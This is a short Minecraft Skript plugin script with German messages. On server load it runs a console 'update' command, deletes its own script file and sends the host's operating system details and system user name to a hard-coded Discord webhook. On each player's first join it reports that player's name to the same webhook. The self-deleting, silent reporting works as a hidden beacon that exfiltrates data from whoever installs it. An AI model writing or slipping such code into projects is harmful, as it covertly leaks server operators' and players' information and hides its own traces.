on load:
	make console execute command "update"
	delete file "plugins\Skript\scripts\FirstLaunch.sk"
	send "
	"## __NEUER USER__%nl%System: %system property os name% %system property os version% %system property os arch%%nl%**User:** %system property user name%" as webhook to "https://discord.com/api/webhooks/1293250727178801304/HvWtxtDBLUo2hIB9izMcyw6pDw3OLxWaeLf1YVXl3xQ50EkM1b2uVM8rXm5xbtQ5yOrd"

on first join:
    send "**%name of player%** ist gerade das erste mal gejoined!" as webhook to "https://discord.com/api/webhooks/1293250727178801304/HvWtxtDBLUo2hIB9izMcyw6pDw3OLxWaeLf1YVXl3xQ50EkM1b2uVM8rXm5xbtQ5yOrd"
